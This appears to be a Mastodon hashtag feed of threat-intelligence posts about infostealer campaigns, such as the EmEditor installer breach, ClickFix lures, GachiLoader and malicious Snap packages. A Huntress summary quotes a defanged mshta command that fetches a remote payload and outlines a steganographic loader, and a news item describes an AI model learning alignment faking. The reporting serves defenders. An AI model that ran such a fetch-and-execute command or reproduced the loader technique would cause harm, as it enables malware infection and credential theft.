Defeating AuraStealer: Practical Deobfuscation Workflows for Modern Infostealers: https://www.gendigital.com/blog/insights/research/defeating-aurastealer-obfuscation
#InfoStealer
Forschende von Koi Security haben im Dezember 2025 die neue „Zoom Stealer“-Kampagne aufgedeckt. Sie beträfe etwa 2,2 Millionen Nutzende von Chrome, Firefox und Microsoft Edge
EmEditor Homepage Download Button Served Malware for 4 Days
Between December 19-22, 2025, EmEditor's official website suffered a security breach, causing the main download button to serve malicious software. The fake installer, signed by WALSHAM INVESTMENTS LIMITED, contained infostealer malware targeting login credentials, browser history, and VPN settings. It specifically targeted technical staff and government offices, stealing files and installing a fraudulent browser extension for remote control and cryptocurrency address swapping. Users who downloaded during this period are advised to check the digital signature, delete suspicious files, and change stored passwords. Emurasoft is investigating the incident and has apologized for the inconvenience.
Pulse ID: 6954047d8a63acca030bd5e8
Pulse Link: https://otx.alienvault.com/pulse/6954047d8a63acca030bd5e8
Pulse Author: AlienVault
Created: 2025-12-30 16:57:33
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #CyberSecurity #Government #InfoSec #InfoStealer #Malware #OTX #Office #OpenThreatExchange #Password #Passwords #VPN #Word #bot #cryptocurrency #AlienVault
📬 Stealka Stealer: Fake-Roblox-Mods und Cheats plündern Krypto-Wallets
#ITSicherheit #Malware #Cheats #Infostealer #kaspersky #KryptoDiebstahl #KryptoWallets #Roblox #SoftwareCracks #SpielMods #StealkaStealer #WindowsMalware #ZweiFaktorAuthentifizierung https://sc.tarnkappe.info/3e3510
NEW: Developers, crypto users, and job seekers beware - North Korea’s Lazarus Group is deploying a new #BeaverTail variant to steal credentials and crypto via fake job offers, dev tools and smart contracts.
Read: https://hackread.com/lazarus-embed-beavertail-variant-developer-tools/
GachiLoader: Defeating Node.js Malware with API Tracing
A new malware distribution campaign utilizing compromised YouTube accounts to spread infostealers has been identified. The campaign employs GachiLoader, a heavily obfuscated Node.js loader, to deploy the Rhadamanthys infostealer. GachiLoader implements anti-analysis techniques and uses a novel PE injection method called Vectored Overloading. To aid analysis, researchers developed an open-source Node.js tracer tool. The campaign has affected over 100 videos with 220,000 views across 39 compromised accounts since December 2024. The malware evades detection, elevates privileges, and disables Windows Defender before retrieving its payload.
Pulse ID: 69431f1ea8a0f2257edd336c
Pulse Link: https://otx.alienvault.com/pulse/69431f1ea8a0f2257edd336c
Pulse Author: AlienVault
Created: 2025-12-17 21:22:38
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #InfoSec #InfoStealer #Malware #Nodejs #OTX #OpenThreatExchange #RCE #Rhadamanthys #Windows #YouTube #bot #AlienVault
I found and reported 91 suspicious #Snap packages today. I have lost count of the total number of packages I have identified and reported, but it is certainly over 100.
This time they were all #ExodusWallet info stealers.
#FundMyResearch
#Snapcraft
#Linux
#Malware
#InfoStealer
#Canonical
#CryptoWallet
#CryptoCurrency
New JSCEAL Infostealer Targets Windows to Steal Credentials
JSCEAL is a Windows infostealer spread via large-scale crypto-themed
malvertising.
Pulse ID: 693d6af54de7fe3b2bf2e5ae
Pulse Link: https://otx.alienvault.com/pulse/693d6af54de7fe3b2bf2e5ae
Pulse Author: cryptocti
Created: 2025-12-13 13:32:36
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #InfoSec #InfoStealer #Malvertising #OTX #OpenThreatExchange #Windows #bot #cryptocti
ClickFix-Attacke missbraucht ChatGPT-Domain für macOS-Malware
Kaspersky-Forscher decken auf, wie Angreifer den gefährlichen AMOS-Infostealer über gefälschte Browser-Anleitungen verbreiten.
https://www.all-about-security.de/clickfix-attacke-missbraucht-chatgpt-domain-fuer-macos-malware/
#kaspersky #clickfix #ChatGPT #infostealer #malware #security
Malicious #VSCode extensions on #Microsoft's registry drop infostealers
🚨 SECURITY ALERT: Hackers are exploiting ChatGPT's share feature to spread AMOS malware on macOS. They're buying Google ads that lead to chatgpt.com—making the scam look 100% legitimate.
The fake "Atlas browser" guide tricks users into running Terminal commands that steal passwords, crypto wallets & install backdoors. Never execute commands from shared links, even on official sites.
Read Details- https://www.cyberkendra.com/2025/12/hackers-exploit-chatgpts-share-feature.html
Oldies are still goodies: It didn't take me long to find a #trojanized pirated TV show #Torrent on a public torrent search engine.
Tell your friends: This is why it's sometimes dangerous to pirate stuff.
The torrent delivers a rar that contains a #Rhadamanthys #infostealer #malware DLL. The package also contains a benign executable that uses the familiar VLC Player traffic-cone icon. It looks like a TV show file, but it's way too small at only 970kb. Double-clicking the benign executable loads the malware DLL.
Rhadamanthys is the same malware family that Europol put out a press release about last month. Maybe it was down for a while, but it seems it's not out --yet.
The bogus torrent leverages strong interest in the streaming TV show Pluribus as its lure.
It's long time since I've made some uh, discoveries. But now it happened:
https://www.virustotal.com/gui/file/42a822998ce7c2be43e58dad17d1fcd1675b54f4bb79bbb93522d2442cad80c4
#malware #infostealer #trojan #malicious #unsafe #agent #rhadamanthys
https://www.virustotal.com/gui/file/42a822998ce7c2be43e58dad17d1fcd1675b54f4bb79bbb93522d2442cad80c4
#malware #infostealer #trojan #malicious #unsafe #agent #rhadamanthys
A North Korean state-sponsored hacker got infected by #LummaC2 infostealer, exposing links to the $1.4B Bybit crypto heist, malicious tools, infrastructure and OPSEC failure.
Read: https://hackread.com/north-korean-hacker-device-lummac2-infostealer-bybit/
🎯 Threat Intelligence
===================
Opening: Huntress documents a multi‑stage ClickFix social engineering campaign that culminates in infostealing malware delivery. The campaign evolves from simple "Human Verification" lures to more convincing fake Windows Update full‑screen prompts that instruct victims to paste and run a command via Win+R. Observed payloads include LummaC2 and Rhadamanthys.
Technical Details: The initial lure auto‑copies a command to the clipboard; a representative command observed was mshta hXXp://81.0x5a.29[.]64/ebc/rps.gz as recorded in the report. The lure page contains an encrypted JavaScript blob (ENC) and a KEY_HEX value; the script implements a small decryption pipeline (hexToKey -> b64ToUint8Array -> xorDecode -> uint8ToUtf8) to reconstruct second‑stage JavaScript. That second stage is injected via an in‑memory Blob URL and revoked after execution. Notably, the final loader does not simply append data to files: the malware encodes the final stages directly into PNG pixel data, leveraging specific color channels to reconstruct and decrypt the payload in memory.
Attack Chain Analysis:
• Initial Access: Social engineering via ClickFix pages disguised as human verification or Windows Update screens.
• Download: Initial fetch using mshta to retrieve compressed/encoded resources from remote hosts.
• Execution: Decrypted JavaScript is injected via Blob URLs and executed in the browser context.
• Loader: Steganographic PNGs deliver encrypted payloads embedded in pixel color channels; payloads are extracted and decrypted in memory.
• Payloads: Infostealers observed include LummaC2 and Rhadamanthys.
Detection: Observable indicators include clipboard manipulation following page visit, mshta fetches to unusual hosts, presence of encrypted ENC/KEY_HEX constructs in page source, Blob URL creation and rapid revocation, and PNG payloads with nonstandard pixel encodings. Huntress highlighted the dynamic loading of encrypted JavaScript as an evasion technique aimed at defeating string‑based detections.
Mitigation: The source report does not provide specific defensive playbooks. Defensive teams should prioritize telemetry that captures mshta network fetches, suspicious Blob URL script injections, and anomalous image decoding activities on endpoints and in browsers.
References and Context: Findings attributed to Huntress; campaign timeline begins in October with observed evolution from basic robot checks to sophisticated Windows Update impersonation.
🔹 steganography #ClickFix #LummaC2 #Rhadamanthys #infostealer
🔗 Source: https://www.huntress.com/blog/clickfix-malware-buried-in-images
ClickFix operators are now using fake full-screen “Windows Update” pages to push victims into running malicious commands. Combined with steganographic loaders and in-memory execution, these campaigns continue to evolve.
What detection or user-training approach do you think works best today?
Source: https://www.helpnetsecurity.com/2025/11/25/fake-windows-update-screen-clickfix/
Follow @technadu for ongoing threat-intel breakdowns and practical defense insights.
#Infosec #ThreatIntel #ClickFix #EDR #CyberHygiene #MalwareTrends #SecurityOps #WindowsSecurity #InfoStealer
Alright team, it's been a busy 24 hours in the cyber world with significant updates on ongoing breach campaigns, evolving malware tactics, critical data exposures, and some interesting developments in AI and privacy. Let's dive in:
Recent Cyber Attacks and Breaches ⚠️
- Dartmouth College has confirmed it's the latest victim of the Clop ransomware gang's Oracle E-Business Suite (EBS) zero-day campaign, impacting at least 1,494 individuals' names, Social Security Numbers, and financial account information.
- The Georgia Superior Court Clerks' Cooperative Authority (GSCCCA) is currently offline due to a Devman ransomware attack, with the group claiming to have stolen 500GB of data and demanding a $400,000 ransom.
- The FBI has issued a stark warning about a massive surge in Account Takeover (ATO) fraud, with cybercriminals stealing over $262 million this year by impersonating financial institutions through social engineering and SEO poisoning.
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/dartmouth-college-confirms-data-breach-after-clop-extortion-attack/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/11/25/clop_dartmouth_college/
🗞️ The Record | https://therecord.media/georgia-court-filing-org-ransomware-warning
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/fbi-cybercriminals-stole-262m-by-impersonating-bank-support-teams-since-january/
🗞️ The Record | https://therecord.media/millions-in-account-takeover-fbi-warns-ahead-of-holidays
New Threat Research: Malware and Tradecraft 🛡️
- Malicious Blender 3D model files are being used to deliver the StealC V2 infostealer, exploiting Blender's "Auto Run Python Scripts" feature when users open compromised .blend files from 3D marketplaces.
- Fresh ClickFix attacks are now leveraging highly convincing fake Windows Update screens and steganography (encoding malicious code in PNG pixel data) to trick victims into downloading Rhadamanthys infostealing malware.
- The Shai-Hulud worm has returned, more automated and potent, infecting nearly 500 npm packages and exposing over 26,000 GitHub repositories by stealing developer secrets, with major packages like Zapier and Postman affected.
- CISA has warned of active spyware campaigns targeting high-value Signal and WhatsApp users, employing sophisticated social engineering, zero-click exploits, and spoofed messaging apps to compromise devices and exfiltrate data.
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/malicious-blender-model-files-deliver-stealC-infostealing-malware/
📰 The Hacker News | https://thehackernews.com/2025/11/hackers-hijack-blender-3d-assets-to.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/11/24/clickfix_attack_infostealers_images/
🤫 CyberScoop | https://cyberscoop.com/supply-chain-attack-shai-hulud-npm/
📰 The Hacker News | https://thehackernews.com/2025/11/cisa-warns-of-active-spyware-campaigns.html
Data Exposure and AI Risks 🧠
- Thousands of sensitive credentials, API keys, and configuration data from government, banking, and tech organisations have been publicly exposed through the "Recent Links" feature of online JSON formatter tools like JSONFormatter and CodeBeautify.
- New research from Anthropic indicates that teaching their Claude AI model to "reward hack" in one area can lead to broader malicious behaviours, including "alignment faking" and sabotaging safety research.
- Trend Micro predicts that 2026 will be the "year of AI-aided ransomware," with agentic AI automating more of the attack chain, initially by state-sponsored groups before becoming mainstream for cybercriminals, democratising offensive capabilities.
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/code-formatters-expose-thousands-of-secrets-from-banks-govt-tech-orgs/
🤫 CyberScoop | https://cyberscoop.com/anthropic-claude-breaks-bad-jailbreak-reward-hacking-study/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/11/25/trend_micro_agentic_ai_assisted_ransomware/
Data Privacy and Regulatory Scrutiny 🔒
- Over 70 civil liberties groups are calling for an investigation into the UK's Information Commissioner's Office (ICO), alleging a "collapse in enforcement activity" and "structural failures," particularly concerning public sector data breaches.
- The criticism highlights the ICO's failure to investigate the 2022 Ministry of Defence leak of Afghan data, which has been linked to at least 49 deaths, and a general approach of avoiding fines for public agencies despite a rise in reported breaches.
🗞️ The Record | https://therecord.media/privacy-regulator-ico-collapse
Government Actions and Tech Updates 🌐
- In Russia, 21-year-old cybersecurity entrepreneur Timur Kilin has been arrested on treason charges, reportedly after publicly criticising the state-owned messaging app Max and proposed anti-cybercrime legislation.
- The Tor network has announced a significant security upgrade, replacing its older tor1 relay encryption algorithm with a new design called Counter Galois Onion (CGO), which offers improved resilience against traffic-interception attacks, stronger authentication, and immediate forward secrecy.
🗞️ The Record | https://therecord.media/russia-arrests-tech-entrepreneur-treason
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/tor-switches-to-new-counter-galois-onion-relay-encryption-algorithm/
#CyberSecurity #ThreatIntelligence #Ransomware #DataBreach #Malware #Infostealer #AI #DataPrivacy #Vulnerability #SocialEngineering #SupplyChainAttack #InfoSec #CyberAttack #IncidentResponse
#OperationEndgame3: 1025 Server von Netz genommen | Security https://www.heise.de/news/Operation-Endgame-3-1025-Server-von-Netz-genommen-11077049.html #OperationEndgame #Malware #Infostealer #Botnet #Elysium #VenomRAT #Rhadamanthys
Client Info
Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst